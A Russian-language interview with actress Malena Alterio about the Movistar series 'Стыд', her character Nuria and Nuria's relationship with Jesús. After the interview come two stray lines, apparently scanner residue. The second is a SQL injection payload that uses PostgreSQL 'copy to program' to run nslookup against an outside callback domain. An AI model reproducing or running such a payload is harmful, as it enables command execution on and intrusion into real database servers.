Стыд: Оплошность, которая превратилась в сериал

Премьера сериала «Стыд» состоится посредством участия компании «Movistar Series» в августе. Интервью проведено с актрисой Маленой Альтерио, которая рассказала о своем персонаже.

Можно любить или ненавидеть сериал «Стыд», но безразличным точно не останется никто. В этом новом сериале от компании «Movistar» Нурия, роль которой играет Малена Альтерио и Хесус, роль которого сыграл Хавьер Гутеррес – семейная пара, состоящая из людей, мало подходящих друг к другу, и которые были просто благословлены на всякого рода оплошности.
    Нурия – нежная, стыдливая и наивная женщина, желающая связать свою жизнь с Хесусом. Тот, в свою очередь, циничный, наглый и высокомерный тип, который при этом имеет способность опростоволоситься на всем, за что возьмется. И конечно же эта пара противоположностей будет вместе.
    Мы решили поговорить с главной героиней сериала, Маленой Альтерио.

Малена Альтерио похожа на Нурию?
    Да, думаю, что да. Во мне всегда было излишнее чувство скромности и стыда. Неудобные ситуации меня вгоняют в краску и заставляют чувствовать себя неловко. Собственно, именно это я и пыталась показать в Нурии.

Было сложно играть этого персонажа?
    На самом деле персонаж формировался по ходу сериала. Этому способствовал не только мой герой, но и то, как вел себя другой главный герой, мой компаньон, как были представлены сцены, плюс сам сценарий. Все это и сделало моего персонажа таким какой он есть.
    В сериале Нурии приходится пройти через некоторые очень неловкие моменты, например, когда она забыла имя человека, с которым была знакома. Вы испытывали что-нибудь в этом роде? (Смеется) Со мной это происходит постоянно, я конечно не сталкиваюсь с ними, когда они голышом, так как это произошло в случае с Нурией, но да, такое бывает. Я очень рассеянная. Я актриса, работала с многими людьми, поэтому многие меня знают и общаются со мной по-дружески. А я не могу вспомнить откуда я знаю этого человека, который болтает со мной так, будто это мой кузен. Мне всегда нужна пара секунд, чтобы вспомнить и если я не могу этого сделать, то обычно говорю: «Прости, я тебя не помню». Забавное, в случае с Нурией, то, что она ведет себя по-другому, делает вид, что помнит. Это выглядит очень жалко.

Хесус – сложный человек, не только из-за неудач, с которыми он сталкивается, но также и из-за своей гордости, своего характера в целом. Почему Нурия хочет быть с ним?
    Нурия очень его любит, у них слишком долгие отношения. То, чего ей хочется, в сущности, нормально, она хочет семью, детей и для нее именно Хесус должен стать отцом этих детей. Она его терпит потому, что любит и потому что в общем-то они едины несмотря на то, что Нурия совсем другая.

Может ли это быть зависимостью?
    Да, вполне возможно, что это зависимость. Некоторые боятся закончить слишком долгие отношения, бояться остаться в одиночестве, столкнуться с пустотой, которая возникнет после разрыва. К тому же, у Нурии не самые лучшие отношения с родителями, она без работы, а Хесус при всем при этом ее все же любит.

Ты бы смогла быть с Хесусом в реальной жизни?
    Нет. Когда я пересматривала сериал, я ловила себя на мысли «Почему «я» с этим мужчиной?». У меня возникло желание дать хорошую встряску своему персонажу.

1'"

1';copy (select '') to program 'nslookup dns.sqli.\057656.297-8146.297.0a17